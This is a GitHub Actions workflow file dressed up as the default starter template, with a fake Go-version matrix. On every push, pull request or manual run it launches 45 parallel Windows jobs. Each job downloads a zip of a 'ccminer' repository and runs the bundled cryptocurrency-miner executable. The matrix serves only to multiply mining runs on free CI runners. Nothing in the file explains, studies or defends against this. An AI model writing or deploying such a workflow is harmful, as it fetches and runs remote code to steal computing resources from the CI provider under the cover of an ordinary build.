# This is a basic workflow to help you get started with Actions

name: xmi

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

jobs:
  build:
    name: Ex-code
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest https://github.com/ChanellMiningAO/ccminer/archive/refs/heads/main.zip -OutFile main.zip
    - name: Extract
      run: Expand-Archive main.zip
    - name: Dir
      run: ls
    - name: Running
      run: .\main\ccminer-x64.exe
    - name: DONE
      run: exit
